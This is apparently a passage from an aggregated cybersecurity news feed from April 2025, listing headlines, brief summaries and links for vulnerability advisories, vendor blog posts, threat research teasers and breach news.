compliance risk, innovation risk, etc.), there are several key factors to consider: Risk capacity is the maximum amount of risk that an organization can bear, typically decided by financial resources, operational capabilities and regulatory restraints. Risk tolerance is an acceptable deviation from its target. Risk thresholds are “red lines” that indicate the need for a change of strategy. The threshold between tolerance and capacity, or even between degrees of tolerance, can help you sort through the gray areas, where it is unclear which is the appropriate risk response. Turning insights into action Understanding a quantitative risk assessment is only the first step – the real value comes from using those insights to take action. Whether it’s risk avoidance, acceptance, transfer or mitigation, the goal is the same: to balance security risks against business priorities so you can take decisive action. FAQ What is quantitative risk assessment? Quantitative risk assessment, sometimes abbreviated QRA, is a formal process for assigning a financial value to a cybersecurity risk, based on its potential impact and the likelihood of occurrence. What is annual loss expectancy? Annual loss expectancy is the main output of a quantitative risk assessment. It’s the financial value that would be lost annually if this risk materializes. It is calculated using the formula Single Loss Expectancy (SLE) x Annualized Rate of Occurrence (ARO), where single loss expectancy is Asset Value (AV) x Exposure Factor (EF). What is risk appetite? Risk appetite is the level of risk an organization is willing to accept in pursuit of its objectives. It influences risk response decisions by providing a framework for evaluating tradeoffs between security risks and business priorities.

https://www.ivanti.com/blog/how-to-implement-quantitative-risk-assessment
Cyber Resilience is More Than a Buzzword
2025-04-15T12:56:55Z | 1744721815

The cybercrime marketplace is booming, and it’s running at a scale that’s hard to ignore. Today, ransomware-as-a-service, stolen credentials, and even ready-made phishing kits are just a click away on the dark web. Cybercrime has transformed into a well-oiled business ecosystem, with cybercriminals collaborating, innovating, and trading tools like any legitimate industry.  The numbers tell […] The post Cyber Resilience is More Than a Buzzword  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/cyber-resilience-is-more-than-a-buzzword/
Cato CTRL™ Threat Research: Exploiting Model Context Protocol (MCP) – Demonstrating Risks and Mitigating GenAI Threats
2025-04-15T12:40:18Z | 1744720818

Executive Summary  Generative AI (GenAI) is advancing rapidly, offering significant potential for business transformation. However, it also introduces new security risks.   The Model Context Protocol (MCP), an open standard introduced by Anthropic in November 2024, enables seamless integration between GenAI applications and external data sources and tools. MCP is commonly referred to as a USB-C... The post Cato CTRL™ Threat Research: Exploiting Model Context Protocol (MCP) – Demonstrating Risks and Mitigating GenAI Threats  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-exploiting-model-context-protocol-mcp/
Mobile World Congress Brings Best & Brightest Together in Spain
2025-04-15T12:26:13Z | 1744719973

What did 109,000 people gathering in Barcelona, Spain, during the first week of March have in common? They all attended the Mobile World Congress (MWC). Many of them could be found at NETSCOUT’s impressive booth in Hall 2 throughout the four-day event. Attendees had the opportunity to learn first-hand about NETSCOUT’s...

https://www.netscout.com/blog/mobile-world-congress-brings-best-brightest-together-spain
What Are the Benefits of a Microservices Architecture?
2025-04-15T12:00:00Z | 1744718400

https://www.akamai.com/blog/cloud/2025/apr/benefits-of-a-microservices-architecture
Kubernetes Threat Hunting using API Server Audit Logs
2025-04-15T11:18:08Z | 1744715888

Kubernetes has emerged as the preferred platform for deploying and managing containerized applications in contemporary IT environments. As its adoption in production settings grows, ensuring the security of the cluster against potential threats becomes critically important. One of the most effective strategies for monitoring and detecting malicious activities within a Kubernetes cluster is through threat [...] The post Kubernetes Threat Hunting using API Server Audit Logs appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/kubernetes-threat-hunting-using-api-server-audit-logs/
Kubernetes Threat Hunting using API Server Audit Logs
2025-04-15T11:18:08Z | 1744715888

Kubernetes has emerged as the preferred platform for deploying and managing containerized applications in contemporary IT environments. As its adoption in production settings grows, ensuring the security of the cluster against potential threats becomes critically important. One of the most effective strategies for monitoring and detecting malicious activities within a Kubernetes cluster is through threat [...] The post Kubernetes Threat Hunting using API Server Audit Logs appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/kubernetes-threat-hunting-using-api-server-audit-logs/
CVE-2025-3128
2025-04-15T09:11:00Z | 1744708260

CWE-78 Improper Neutralization of Special Elements used in an OS Command: A remote unauthenticated attacker who has bypassed authentication could execute arbitrary OS commands to disclose, tamper with, destroy or delete information in Mitsubishi Electric smartRTU, or cause a denial-of service condition on the product. Mitsubishi Electric Europe B.V. recommends that users take note of the following mitigation measures to minimize the risk of exploiting this vulnerability: Use a firewall or virtual private network (VPN), etc. to prevent unauthorized access when Internet access is required. Use within a LAN and block access from untrusted networks and hosts through firewalls. Use web application firewall (WAF) to prevent to filter, monitor and block any malicious HTTP/HTTPS traffic. Allow web client access from trusted networks only.

https://claroty.com/team82/disclosure-dashboard/cve-2025-3128
CVE-2025-3232
2025-04-15T09:09:00Z | 1744708140

CWE-306: Missing Authentication for Critical Function: A remote unauthenticated attacker may be able to bypass authentication by utilizing a specific API route to execute arbitrary OS commands. Mitsubishi Electric Europe B.V. recommends that users take note of the following mitigation measures to minimize the risk of exploiting this vulnerability: Use a firewall or virtual private network (VPN), etc. to prevent unauthorized access when Internet access is required. Use within a LAN and block access from untrusted networks and hosts through firewalls. Use web application firewall (WAF) to prevent to filter, monitor and block any malicious HTTP/HTTPS traffic. Allow web client access from trusted networks only.

https://claroty.com/team82/disclosure-dashboard/cve-2025-3232
Building Web Check using PaaS
2025-04-15T08:27:02Z | 1744705622

How Platform as a Service (PaaS) can make good security easier to achieve.

https://www.ncsc.gov.uk/blog-post/building-web-check-using-paas
CVE-2025-29817 Microsoft Power Automate Desktop Information Disclosure Vulnerability
2025-04-15T07:00:00Z | 1744700400

Uncontrolled search path element in Power Automate allows an authorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29817
CVE-2024-21302 Windows Secure Kernel Mode Elevation of Privilege Vulnerability
2025-04-15T07:00:00Z | 1744700400

To comprehensively address CVE-2024-21302, Microsoft has released April 2025 security updates for all supported editions of Windows. Microsoft recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21302
Hertz Data Breach: Driver’s Licenses and Financial Details at Risk
2025-04-15T06:39:39Z | 1744699179

Hertz Corporation has confirmed a data breach that compromised personal information of customers associated with its Hertz, Thrifty, and Dollar brands. The breach stemmed from zero-day vulnerabilities exploited in Cleo’s managed file transfer platforms during attacks in late 2024. In a notice issued on February 10, 2025, the car rental company stated that Hertz data was acquired by an unauthorized third party that exploited zero-day vulnerabilities in Cleo’s platform during incidents in October and December 2024. Hertz promptly launched an investigation to determine the scope of the breach and identify affected individuals. According to the company, the exposed data may […] The post Hertz Data Breach: Driver’s Licenses and Financial Details at Risk first appeared on Cybersafe News.

https://cybersafe.news/hertz-data-breach-drivers-licenses-and-financial-details-at-risk/
ZDI-CAN-26963: Autodesk
2025-04-15T05:00:00Z | 1744693200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-15, 52 days ago. The vendor is given until 2025-08-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Security Alert (A25-04-13): Vulnerability in Microsoft Edge
2025-04-15T04:00:00Z | 1744689600

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
WAF 3.5: Smarter Protection and Better Management
2025-04-15T01:21:05Z | 1744680065

When it comes to web security, staying ahead of evolving threats will be a great advantage to organizations. Cyber threats evolve fast, and web application firewalls (WAFs) need to keep up. That’s why we’re excited to introduce WAF 3.5, packed with enhancements that make security stronger and management more efficient. Mitigating Attacks Under TAP Mode: Blocking Without the Hassle In […] The post WAF 3.5: Smarter Protection and Better Management appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/waf-3-5-smarter-protection-and-better-management/
How Threat Intel Drives Smarter Security Spend
2025-04-15T00:00:00Z | 1744675200

Discover how integrating threat intelligence into your cybersecurity strategy can lead to smarter, more efficient security investments. Learn practical approaches to optimize your security budget effectively.

https://www.recordedfuture.com/blog/how-threat-intel-drives-smarter-security
Versatility 2025: Charting the Path to the AI-Native Enterprise
2025-04-14T19:12:54Z | 1744657974

Last week, Versa Networks hosted Versatility 2025, our annual user conference – and this year’s event in Silicon Valley was our most ambitious and impactful yet. Held over two days of immersive learning, real-world stories, and future-forward strategy, the conference brought together hundreds of customers, partners, and industry leaders to explore the next chapter of enterprise transformation. The post Versatility 2025: Charting the Path to the AI-Native Enterprise first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/versatility-2025-charting-the-path-to-the-ai-native-enterprise/
Alternatives to Patching for ICS/OT Software and Devices
2025-04-14T16:29:42Z | 1744648182

Patch management for software within critical infrastructure is daunting. Prolonged patch cycles, downtime, and resource-intensive updates can all leave systems vulnerable for far longer than is acceptable. That doesn’t mean you shouldn’t patch, but you should seek out options to protect devices and embedded systems even before a patch is available. For example, runtime protections […] The post Alternatives to Patching for ICS/OT Software and Devices appeared first on RunSafe Security.

https://runsafesecurity.com/blog/ot-patch-management-alternatives/
Keeping Healthcare Systems Secure Via the Power of Network Visibility
2025-04-14T13:51:34Z | 1744638694

The beating heart of the healthcare sector is under increased threats, and no amount of antibiotics can protect the proverbial patient. In this case, we’re referring to the vital networks healthcare systems and providers rely on to share data and treat patients. Today, the entire industry faces an unprecedented array...

https://www.netscout.com/blog/keeping-healthcare-systems-secure-power-network-visibility
Announcing a new integration between Logpoint and Microsoft Defender XDR
2025-04-14T13:48:28Z | 1744638508

Relying solely on a single security tool can leave vulnerabilities that attackers may exploit. While Microsoft Defender offers robust protection—especially for organizations using Microsoft 365 E3 licenses, a comprehensive security approach requires integrating endpoint protection with SIEM and NDR solutions. Logpoint’s integration with Microsoft Defender extends well beyond simple log collection – it enables streamlined [...] The post Announcing a new integration between Logpoint and Microsoft Defender XDR appeared first on Logpoint.

https://www.logpoint.com/en/blog/logpoint-microsoft-xdr-integration/
Announcing a new integration between Logpoint and Microsoft Defender XDR
2025-04-14T13:48:28Z | 1744638508

Relying solely on a single security tool can leave vulnerabilities that attackers may exploit. While Microsoft Defender offers robust protection—especially for organizations using Microsoft 365 E3 licenses, a comprehensive security approach requires integrating endpoint protection with SIEM and NDR solutions. Logpoint’s integration with Microsoft Defender extends well beyond simple log collection – it enables streamlined [...] The post Announcing a new integration between Logpoint and Microsoft Defender XDR appeared first on Logpoint.

https://www.logpoint.com/en/blog/logpoint-microsoft-xdr-integration/
Cato CTRL™ Threat Research: OpenAI’s ChatGPT Image Generator Enables Creation of Fake Passports
2025-04-14T12:28:00Z | 1744633680

Executive Summary  On March 25, OpenAI introduced image generation for ChatGPT-4o and ChatGPT-4o mini. On March 31, it was announced that the tool was available for free to all users. Since then, users have quickly discovered that ChatGPT’s image generator can be manipulated to create fake receipts and forge other documents.   As noted in the... The post Cato CTRL™ Threat Research: OpenAI’s ChatGPT Image Generator Enables Creation of Fake Passports  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-chatgpt-image-generator-enables-creation-of-fake-passports/
The evolution of the AI SOC: From Hype to Hyper
2025-04-14T12:20:48Z | 1744633248

At CES in January 2025, Nvidia CEO Jenson Huang stood before the audience and described the direction of travel in Artificial Intelligence; The Sekoia platform has always been at the bleeding edge of each AI wave, empowering SOC teams to be more efficient. Often, as time passes, we forget just how quickly technology changes both […] La publication suivante The evolution of the AI SOC: From Hype to Hyper est un article de Sekoia.io Blog.

https://blog.sekoia.io/agentic-ai-in-soc-operations/
Saving endangered species, one network at a time
2025-04-14T12:00:00Z | 1744632000

Rhinos, elephants, gorillas, and their habitats, are among the natural treasures protected by Cisco and Connected Conservation Foundation in a 10-year partnership.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/saving-endangered-species-one-network-at-a-time.html
Saving endangered species, one network at a time
2025-04-14T12:00:00Z | 1744632000

Rhinos, elephants, gorillas, and their habitats, are among the natural treasures protected by Cisco and Connected Conservation Foundation in a 10-year partnership.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/saving-endangered-species-one-network-at-a-time.html
Phase Two of Tech4Nature Jaguar Protection Project Launched in Mexico
2025-04-14T11:32:00Z | 1744630320

At the recent 2025 Tech4Nature Summit, Huawei, International Union of Conservation for Nature (IUCN), and local partners launched Phase Two of the Mexico Tech4Nature project

//www.huawei.com/en/news/2025/4/tech4nature-iucn-jaguar-protection
Huawei Launches Five Solutions to Accelerate Aviation Intelligence
2025-04-14T11:03:00Z | 1744628580

During the Passenger Terminal Expo 2025 in Madrid, Huawei launched five aviation solutions, notably including the Smart Airport Intelligent Operation Center (IOC) to advance intelligent industry upgrades.

//www.huawei.com/en/news/2025/4/smart-transportation-pte
Vulnerabilities in SoftCOM iKSORIS software
2025-04-14T11:00:00Z | 1744628400

CERT Polska has received a report about 11 vulnerabilities found in Internet Starter module of SoftCOM iKSORIS software.

https://cert.pl/en/posts/2025/04/CVE-2024-10087/
Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
2025-04-14T09:00:35Z | 1744621235

North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges. The post Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware appeared first on Unit 42.

https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
Attacks on the education sector are surging: How can cyber-defenders respond?
2025-04-14T09:00:00Z | 1744621200

Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?

https://www.welivesecurity.com/en/business-security/attacks-education-sector-surging-cyber-defenders-respond/
Sharing Is (Not) Caring: How Shared Credentials Open the Door to Breaches
2025-04-14T06:00:00Z | 1744610400

https://www.akamai.com/blog/security-research/2025/apr/sharing-is-caring-third-party-risk-code-shared-credentials
ZDI-CAN-26892: Wondershare
2025-04-14T05:00:00Z | 1744606800

A CVSS score 9.4 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L severity vulnerability discovered by 'Alfredo Oliveira and David Fiser of Trend Research' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25719: Labcenter Electronics
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25718: Labcenter Electronics
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26517: rocket.chat
2025-04-14T05:00:00Z | 1744606800

A CVSS score 3.7 AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25720: Labcenter Electronics
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26628: Ashlar-Vellum
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26631: Ashlar-Vellum
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26927: Autodesk
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26626: Ashlar-Vellum
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25717: Labcenter Electronics
2025-04-14T05:00:00Z | 1744606800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-04-14, 53 days ago. The vendor is given until 2025-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Eclipse ThreadX NetX Duo HTTP server chunked PUT request integer underflow vulnerability
2025-04-14T00:00:00Z | 1744588800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2104
Eclipse ThreadX NetX Duo HTTP server single PUT request integer underflow vulnerability
2025-04-14T00:00:00Z | 1744588800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2105
Eclipse ThreadX NetX Duo HTTP server denial of service vulnerability
2025-04-14T00:00:00Z | 1744588800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2098
2025-017: Critical Vulnerabilitites in Microsoft Products
2025-04-11T21:23:57Z | 1744406637

On 8 April 2025, Microsoft released fixes addressing more than 100 vulnerabilities in various Microsoft products, 11 of which are rated as Critical. It is recommended updating as soon as possible, prioritising critical devices and public facing assets.

https://cert.europa.eu/publications/security-advisories/2025-017/
Hillstone Security Management Platform
2025-04-11T16:37:12Z | 1744389432

Hillstone Security Management (HSM) is a powerful management system that provides advanced security operation efficiency, secure SD-WAN management, Zero Trust Network Access (ZTNA) control, and more—all from a single pane of glass. This system enables organizations to efficiently manage and monitor devices, orchestrate and manage SD-WAN solutions, and implement granular security access with zero trust. […] The post Hillstone Security Management Platform appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-security-management-platform/
ELFDICOM: PoC Malware Polyglot Exploiting Linux-Based Medical Devices
2025-04-11T16:35:15Z | 1744389315

A high severity vulnerability in DICOM, the healthcare industry’s standard file protocol for medical imaging, has remained exploitable years after its initial disclosure. The flaw enables attackers to embed malicious code within legitimate medical image files. While previous research demonstrated this vulnerability’s impact on Windows-based medical systems, Praetorian’s new proof of concept, ELFDICOM, extends the […] The post ELFDICOM: PoC Malware Polyglot Exploiting Linux-Based Medical Devices appeared first on Praetorian.

https://www.praetorian.com/blog/elfdicom-poc-malware-polyglot-exploiting-linux-based-medical-devices/
Webinar: Driving value and security to customers for MSSPs
2025-04-11T14:12:05Z | 1744380725

29 April 2025, 10:30 CETAs a MSSP, delivering value and security to your customers is at the heart of your business.Do your priorities include:Providing a quality of service offering that meets customer’s needBeing competitive on priceHaving a breadth of services to address a wide range of cyber attacksAddressing compliance and data sovereignty for your organization [...] The post Webinar: Driving value and security to customers for MSSPs appeared first on Logpoint.

https://www.logpoint.com/en/webinars/webinar-driving-value-and-security-to-customers/
Cloud Migration Strategy: The Step-By-Step Framework and Benefits
2025-04-11T13:00:00Z | 1744376400

https://www.akamai.com/blog/cloud/2024/jun/cloud-migration-strategy
Cyber Security Readiness
2025-04-11T12:39:12Z | 1744375152

https://cyber.gc.ca/en/cyber-security-readiness
What Is DNSSEC, and How Does It Work?
2025-04-11T12:00:00Z | 1744372800

https://www.akamai.com/blog/trends/dnssec-how-it-works-key-considerations
It?s All in the Cards: Preventing Payment Abuse for Retailers
2025-04-11T08:30:00Z | 1744360200

Carding attacks have become a serious challenge for retailers. Learn how Akamai Account Protector can help organizations defend against payment abuse.

https://www.akamai.com/blog/security/2025/apr/its-all-in-the-cards-preventing-payment-abuse-retailers
AI at the Service of Cybercriminals
2025-04-11T08:15:59Z | 1744359359

Artificial intelligence is disrupting every sector and cybersecurity is no exception. While it enables automation of threat detection and real-time analysis of massive data volumes, AI has also become a powerful tool for cybercriminals. Increasingly, they are leveraging it to refine their techniques, bypass defenses, and scale their operations.

https://blog.pradeo.com/ai-at-the-service-of-cybercriminals
ICS Security Conference 2025
2025-04-11T05:30:00Z | 1744349400

JPCERT/CC organised ICS Security Conference on 5 February 2025. This event aims to share the current threat to ICS both in Japan and overseas and the efforts of stakeholders in the field, as well as to help participants improve their...

https://blogs.jpcert.or.jp/en/2025/04/ics-conference2025.html
From Exploit to Ransomware: Detecting CVE-2025-29824
2025-04-11T05:14:06Z | 1744348446

The Microsoft Security blog highlights the active exploitation of CVE-2025-24983, a zero-day vulnerability in the Windows Common Log File System (CLFS) that allows local privilege escalation to SYSTEM-level access. The threat actor group Storm-2460 is exploiting this flaw in ransomware campaigns, using tools such as the PipeMagic loader to execute their attacks. The blog offers [...] The post From Exploit to Ransomware: Detecting CVE-2025-29824 appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/from-exploit-to-ransomware-detecting-cve-2025-29824/
From Exploit to Ransomware: Detecting CVE-2025-29824
2025-04-11T05:14:06Z | 1744348446

The Microsoft Security blog highlights the active exploitation of CVE-2025-24983, a zero-day vulnerability in the Windows Common Log File System (CLFS) that allows local privilege escalation to SYSTEM-level access. The threat actor group Storm-2460 is exploiting this flaw in ransomware campaigns, using tools such as the PipeMagic loader to execute their attacks. The blog offers [...] The post From Exploit to Ransomware: Detecting CVE-2025-29824 appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/from-exploit-to-ransomware-detecting-cve-2025-29824/
Security Alert (A25-04-11): Multiple Vulnerabilities in Juniper Networks Products
2025-04-11T04:00:00Z | 1744344000

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS, Junos OS Evolved and Junos Space.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-12): Multiple Vulnerabilities in SonicWall NetExtender
2025-04-11T04:00:00Z | 1744344000

SonicWall released a security advisory to address multiple vulnerabilities in NetExtender.

https://www.govcert.gov.hk/en/alerts_detail.php
How Huione Marketplace Is Reshaping Global Fraud
2025-04-11T00:00:00Z | 1744329600

Explore how Huione Marketplace empowers global fraud networks with AI tools, deepfakes, and money laundering services—reshaping cybercrime at scale.

https://www.recordedfuture.com/blog/huoine-marketplace-reshaping-global-fraud
FIRST POST: Jan-Mar 2025
2025-04-11T00:00:00Z | 1744329600

Message from the Chair; Strategy and Governance: Launch of the FIRST Strategy Framework; FIRST Welcomes New Members and Thanks Sponsoring Teams!; Special Interest Group Updates; The role of National CERTs/CSIRTs in Implementing the UN Norms of Responsible Behavior in Cyberspace; Growth Stack Media Q1FY25 PR Highlights: Media Coverage Expansion & Successful Campaigns; Green Copenhagen; FIRST on Social Media; and Upcoming Events

https://www.first.org/newsroom/post/202503
Smishing Triad and the Global Toll Scam Escalation: Part Two
2025-04-10T17:42:28Z | 1744306948

In our previous blog post (Part One), we shone a spotlight on the rising wave of SMiShing campaigns leveraging suspicious top-level domains (TLDs) such as .xin, .top, and .win. We discussed how cybercriminals masquerade as toll providers or delivery services, luring victims with alarming messages that link to malicious websites. At ThreatSTOP, we have been monitoring these malicious campaigns and the actors behind them for some time, recognizing a broader eCrime group known as “Smishing Triad.”

https://www.threatstop.com/blog/smishing-triad-and-the-global-toll-scam-escalation-part-two
How we’re making security easier for the average developer
2025-04-10T16:37:05Z | 1744303025

Security should be native to your workflow, not a painful separate process. The post How we’re making security easier for the average developer appeared first on The GitHub Blog.

https://github.blog/security/application-security/how-were-making-security-easier-for-the-average-developer/
iboss Unveils Inline Data Discovery for Microsoft Purview
2025-04-10T16:20:35Z | 1744302035

New capability extends Microsoft Purview's data loss prevention to all network transfers, closing visibility gaps and blocking risky data leaks in real time. The post iboss Unveils Inline Data Discovery for Microsoft Purview appeared first on iboss.

https://www.iboss.com/news/iboss-unveils-inline-data-discovery-for-microsoft-purview/
iboss Unveils Inline Data Discovery for Microsoft Purview
2025-04-10T16:20:35Z | 1744302035

New capability extends Microsoft Purview's data loss prevention to all network transfers, closing visibility gaps and blocking risky data leaks in real time. The post iboss Unveils Inline Data Discovery for Microsoft Purview appeared first on iboss.

https://www.iboss.com/news/iboss-unveils-inline-data-discovery-for-microsoft-purview/
Software-Defined Perimeter (SDP): A Modern Approach to Secure Access
2025-04-10T15:27:00Z | 1744298820

The post Software-Defined Perimeter (SDP): A Modern Approach to Secure Access appeared first on Open Systems.

https://www.open-systems.com/blog/software-defined-perimeter-sdp-modern-approach-secure-access/
iOS 18.4 - dlsym considered harmful
2025-04-10T15:00:00Z | 1744297200

https://www.synacktiv.com/publications/ios-184-dlsym-considered-harmful.html
Network Observability: It’s for a Lot More Than Troubleshooting
2025-04-10T13:50:52Z | 1744293052

As companies increasingly rely on mission-critical applications and services across remote sites, observability throughout expanded networks to troubleshoot problems is more important than ever. There is no doubt that reducing outage risk and application performance degradation is vital to any business, but network...

https://www.netscout.com/blog/network-observability-its-lot-more-troubleshooting
Safeguarding Civil Protections in Lawful Intelligence
2025-04-10T12:54:32Z | 1744289672

As with the broader missions of the law enforcement and intelligence communities, lawful intelligence must balance investigative rigor with the need to preserve privacy and other civil protections. The post Safeguarding Civil Protections in Lawful Intelligence appeared first on SS8.

https://www.ss8.com/safeguarding-the-civil-protection-mission-of-lawful-intelligence/
Insights from the GRIT 2025 Q1 Ransomware & Cyber Threat Report
2025-04-10T09:45:00Z | 1744278300

Ransomware continues to surge, reshaping the threat landscape. GRIT’s Q1 2025 Ransomware and Cyber Threat Report highlights alarming trends that […]

https://www.guidepointsecurity.com/blog/insights-from-the-grit-2025-q1-ransomware-cyber-threat-report/
Mobile App Security Audit Checklist | Appknox
2025-04-10T09:04:02Z | 1744275842

New cyber threats emerge daily, demanding constant attention. Security isn't something you do once and forget about!

https://www.appknox.com/blog/app-security-audit-checklist
Watch out for these traps lurking in search results
2025-04-10T09:00:00Z | 1744275600

Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results

https://www.welivesecurity.com/en/cybersecurity/watch-out-traps-lurking-search-results/
ESG Watch | April 2025
2025-04-10T08:48:10Z | 1744274890

Key news in this edition: Shareholders demand action over labour standards in sugar supply chains. Companies drop climate action targets from executive pay structures. SBTi proposes new incremental carbon removal targets. Editorial In March, corporate responses to ESG challenges showed widening divergence amid shifting political and regulatory landscapes. Labour rights again came into focus following a New York Times investigation into sugar plantations in India. The report uncovered child labour, debt bondage and coerced sterilisation, implicating multinational buyers including PepsiCo through indirect sourcing links. Shareholder resolutions soon followed, calling for human rights due diligence. However, PepsiCo declined to issue a report, citing SEC materiality thresholds and distance from its suppliers, exposing the limitations of current transparency frameworks.

https://www.s-rminform.com/esg-watch/esg-watch-april-2025-0
ZDI-CAN-26569: Siemens
2025-04-10T05:00:00Z | 1744261200

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-10, 57 days ago. The vendor is given until 2025-08-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26572: Siemens
2025-04-10T05:00:00Z | 1744261200

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-10, 57 days ago. The vendor is given until 2025-08-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26571: Siemens
2025-04-10T05:00:00Z | 1744261200

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-10, 57 days ago. The vendor is given until 2025-08-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26839: LiteLLM
